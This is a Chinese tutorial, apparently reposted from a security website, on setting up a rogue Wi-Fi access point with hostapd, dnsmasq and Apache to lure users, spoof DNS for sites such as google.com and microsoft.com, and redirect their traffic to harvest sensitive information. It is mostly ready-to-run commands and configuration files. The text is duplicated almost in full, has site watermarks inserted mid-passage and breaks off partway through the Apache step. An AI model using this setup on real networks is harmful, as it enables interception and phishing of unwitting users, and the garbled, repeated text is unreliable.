无线安全课堂:手把手教会你搭建伪AP接入点
概述
*本文假设读者对设置伪AP接入点以及Apache配置有足够了解。
在本攻击场景中,我们将使用到alfa无线网卡以及用于网络访问的以太网连接(虚拟机环境下,物理机下无需此配置)。你也可以使用虚拟接口执行这种攻击,但一定要确保使用合适的的接口名。
所用工具
hostapd(或airbase-ng)dnsmasq(或isc-dhcp-server)Apache2Nano或Vi文本编辑器grep
为了攻击环境设置更方便快捷,我就直接使用相对趁手的非括号内的工具了,当然你也可以选择对自己方便的工具。
新手指南 – 设置伪AP接入点
Hostapd
可以建立一个开放式(不加密)的,WPA2 personal或WPA2 enterprise的无线网络
dnsmasq
轻量级DNS / DHCP服务器,用于解析机器间的dns请求,同时也可以作为DHCP服务器为客户端分配IP地址
Apache
虽说其仅仅只是作为一个供客户端访问的Web服务,在攻击中Apache以及Mysql都不是那么重要,然而使用Apache可以让你的Web服务以及伪无线热点更加丰富多彩。尽管根据攻击场景的不同,会有一些其他更先进的技术,但是只要你是想设置一个伪无线热点,那么hostapd以及dnsmasq则是不可或缺的。这里的先进技术则是指的Apache的产品特性以及其灵活性。
举例:
比如说你勾引用户连接上你架设的无线热点,单纯的只是想嗅探或者重定向流量,那么你就不需要使用到Apache。如果你需要响应基于用户发起的请求,想通过某些技巧获得更多的敏感信息,这时Apache就得登场了。注意:所有命令都以root身份执行,如果你是非root用户(标准用户)记得使用sudo命令
安装:
确保安装最新版本的工具:
apt update
apt install hostapd dnsmasq apache2
接着创建一个用于保存所有配置文件的目录
cd ~/Desktop
mkdir fakeap/
配置hostapd:
创建一个空白文档用以写入配置文件,打开终端然后创建hostapd配置文件
nano hostapd.conf
interface=
driver=nl80211
ssid=
hw_mode=g
channel=
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
保存并退出文档,每次执行攻击前都进行相应的修改Channel选项中,如果数字填写不当很容易出问题
配置dnsmasq:
nano dnsmasq.conf
interface= # wlan0 with hostapd, at0 with airbase-ng
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
确保在dnsmasq.conf文件中定义接口名没有错
参数分解:
dhcp-range=10.0.0.10,10.0.0.250,12h: 客户端IP地址范围从 10.0.0.10 到 10.0.0.250, 网络子网掩码为 255.255.255.0 默认租约时间为 12小时.
dhcp-option=3,10.0.0.1: 3 为默认网关代码,随后是IP地址 i.e. 10.0.0.1
dhcp-option=6,10.0.0.1: 6 为DNS服务器随后是IP地址
这就是所有需要配置的信息了,简单吗?接下来就运行服务,启动我们的伪无线热点吧!
Step 1:启动伪AP
首先结束掉可能会影响我们实验的运行进程
killall network-manager dnsmasq wpa_supplicant dhcpd
使用之前的配置文件启动hostapd语法:hostapd /path/to/configuration/file.conf
cd ~/Desktop/fakeap/
hostapd hostapd.conf
成功启动hostapd,之后我们需要运行DHCP服务用以给客户端分配IP地址
Step 2:启动dhcp服务器
在调试模式下使用配置文件运行dnsmasq语法:dnsmasq -C /path/to/configuration/file.conf -d
dnsmasq - C dnsmasq .conf - d
可选配置:
你可以为dnsmasq创建一个可选的fakehosts.conf文件,以便将目标网站流量重定向到你所需的IP地址
vi fakehosts .conf
10.0.0.1 apple.com
10.0.0.1 google.com
10.0.0.1 android.clients.google.com
10.0.0.1 microsoft.com
10.0.0.1 android.com
10.0.0.1 apple.com
10.0.0.1 google.com
10.0.0.1 android.clients.google.com
10.0.0.1 microsoft.com
10.0.0.1 android.com
只需给该文件加上-H参数传递给dnsmasq,之后这些站点的流量将得到控制。如果你只是希望针对某个网站或者特定客户端,可以早-H参数后面加上fakehosts.conf进行dns欺骗
dnsmasq -C dnsmasq.conf -H fakehosts.conf -d
Step 3:Apache2 webserver配置
Apache的Rewrite引擎允许我们处理Web请求,利用该技术我们可以玩出很多花样。无论是Android,iOS,Windows还是Mac,都可以通过apache websever定制针对不同类型设备的攻击,甚至可以精确到特定的操作系统版本。比如说针对iOS 9.x客户端的攻击向量就与针对iOS 10客户端的攻击向量不同。由于Windows机器的广泛使用,这里我们就以Windows机器为目标进行演示。打开apache默认配置文件修改rewrite函数,这会将几乎所有URL重定向回我们架设的伪AP记录。打开apache的默认配置文件
nano /etc/apache2/sites-enabled/000-default
在文件标签之间的–> add后新开一行将/Fixit目录设置为例外(区分大小写)
概述
*本文假设读者对设置伪AP接入点以及Apache配置有足够了解。
在本攻击场景中,我们将使用到alfa无线网卡以及用于网络访问的以太网连接(虚拟机环境下,物理机下无需此配置)。你也可以使用虚拟接口执行这种攻击,但一定要确保使用合适的的接口名。
所用工具
hostapd(或airbase-ng)dnsmasq(或isc-dhcp-server)Apache2Nano或Vi文本编辑器grep
为了攻击环境设置更方便快捷,我就直接使用相对趁手的非括号内的工具了,当然你也可以选择对自己方便的工具。
新手指南 – 设置伪AP接入点
Hostapd
可以建立一个开放式(不加密)的,WPA2 personal或WPA2 enterprise的无线网络
dnsmasq
轻量级DNS / DHCP服务器,用于解析机器间的dns请求,同时也可以作为DHCP服务器为客户端分配IP地址
Apache
虽说其仅仅只是作为一个供客户端访问的Web服务,在攻击中Apache以及Mysql都不是那么重要,然而使用Apache可以让你的Web服务以及伪无线热点更加丰富多彩。尽管根据攻击场景的不同,会有一些其他更先进的技术,但是只要你是想设置一个伪无线热点,那么hostapd以及dnsmasq则是不可或缺的。这里的先进技术则是指的Apache的产品特性以及其灵活性。 本文来自无奈人生安全网
举例:
比如说你勾引用户连接上你架设的无线热点,单纯的只是想嗅探或者重定向流量,那么你就不需要使用到Apache。如果你需要响应基于用户发起的请求,想通过某些技巧获得更多的敏感信息,这时Apache就得登场了。注意:所有命令都以root身份执行,如果你是非root用户(标准用户)记得使用sudo命令
安装:
确保安装最新版本的工具:
apt update
apt install hostapd dnsmasq apache2
接着创建一个用于保存所有配置文件的目录
cd ~/Desktop
mkdir fakeap/
配置hostapd:
创建一个空白文档用以写入配置文件,打开终端然后创建hostapd配置文件
nano hostapd.conf
interface=
driver=nl80211
ssid=
hw_mode=g
channel=
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
保存并退出文档,每次执行攻击前都进行相应的修改Channel选项中,如果数字填写不当很容易出问题
配置dnsmasq:
nano dnsmasq.conf
interface= # wlan0 with hostapd, at0 with airbase-ng
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
内容来自无奈安全网
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
确保在dnsmasq.conf文件中定义接口名没有错
参数分解:
dhcp-range=10.0.0.10,10.0.0.250,12h: 客户端IP地址范围从 10.0.0.10 到 10.0.0.250, 网络子网掩码为 255.255.255.0 默认租约时间为 12小时.
dhcp-option=3,10.0.0.1: 3 为默认网关代码,随后是IP地址 i.e. 10.0.0.1
dhcp-option=6,10.0.0.1: 6 为DNS服务器随后是IP地址
这就是所有需要配置的信息了,简单吗?接下来就运行服务,启动我们的伪无线热点吧!
Step 1:启动伪AP
首先结束掉可能会影响我们实验的运行进程
killall network-manager dnsmasq wpa_supplicant dhcpd
使用之前的配置文件启动hostapd语法:hostapd /path/to/configuration/file.conf
cd ~/Desktop/fakeap/
hostapd hostapd.conf
成功启动hostapd,之后我们需要运行DHCP服务用以给客户端分配IP地址
Step 2:启动dhcp服务器
在调试模式下使用配置文件运行dnsmasq语法:dnsmasq -C /path/to/configuration/file.conf -d
dnsmasq - C dnsmasq .conf - d
可选配置:
你可以为dnsmasq创建一个可选的fakehosts.conf文件,以便将目标网站流量重定向到你所需的IP地址
vi fakehosts .conf
10.0.0.1 apple.com
10.0.0.1 google.com
10.0.0.1 android.clients.google.com
10.0.0.1 microsoft.com
10.0.0.1 android.com
10.0.0.1 apple.com
10.0.0.1 google.com
10.0.0.1 android.clients.google.com
10.0.0.1 microsoft.com
10.0.0.1 android.com
只需给该文件加上-H参数传递给dnsmasq,之后这些站点的流量将得到控制。如果你只是希望针对某个网站或者特定客户端,可以早-H参数后面加上fakehosts.conf进行dns欺骗
dnsmasq -C dnsmasq.conf -H fakehosts.conf -d
Step 3:Apache2 webserver配置
Apache的Rewrite引擎允许我们处理Web请求,利用该技术我们可以玩出很多花样。无论是Android,iOS,Windows还是Mac,都可以通过apache websever定制针对不同类型设备的攻击,甚至可以精确到特定的操作系统版本。比如说针对iOS 9.x客户端的攻击向量就与针对iOS 10客户端的攻击向量不同。由于Windows机器的广泛使用,这里我们就以Windows机器为目标进行演示。打开apache默认配置文件修改rewrite函数,这会将几乎所有URL重定向回我们架设的伪AP记录。打开apache的默认配置文件
nano /etc/apache2/sites-enabled/000-default
在文件标签之间的–> add后新开一行将/Fixit目录设置为例外(区分大小写)
copyright 无奈人生